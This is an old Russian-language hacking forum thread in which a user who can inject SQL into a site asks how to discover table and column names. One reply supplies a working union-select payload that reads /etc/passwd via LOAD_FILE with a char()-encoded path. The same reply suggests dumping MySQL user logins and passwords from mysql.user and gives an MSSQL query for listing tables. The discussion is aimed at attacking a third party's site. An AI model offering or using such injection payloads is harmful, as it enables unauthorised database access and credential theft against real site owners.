Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)... |
23.02.2006, 13:45
|
|
Новичок
Регистрация: 14.11.2005
Сообщений: 19
Провел на форуме:
106801
Репутация:
5
|
|
Есть возможность произвести sql-inj, но нет информации о таблицах(названия ,поля)...
Есть возможность произвести sql-inj,
но нет информации о таблицах(названия ,поля)
Если кто-нибудь знает, как получить эту инфу ,помогите плз.
Последний раз редактировалось perun; 23.02.2006 в 13:55..
|
|
|
23.02.2006, 14:19
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
Если mysql, то пробуй mysql.user дальше логины и пасы от мускуля посмотришь в столбцах user и password. Подругому никак  Можешь файлы почитать:
http://site/test.php?id=9999+union+select+null,LOAD_FILE(char( 47,101,116,99,47,112,97,115,115,119,100)),null/*
Если mmsql, то этот запрос
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
вернет первую таблицы в базе.
Если что-то проканает, пиши... помогу дальше |
|
|
|
23.02.2006, 14:23
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
|
|
|
|
24.02.2006, 02:44
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754
Репутация:
97
|
|
если там стоит кактойто готовый движок то можно полпробывать найти скачать и посмотреть структуру на локалхосте...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
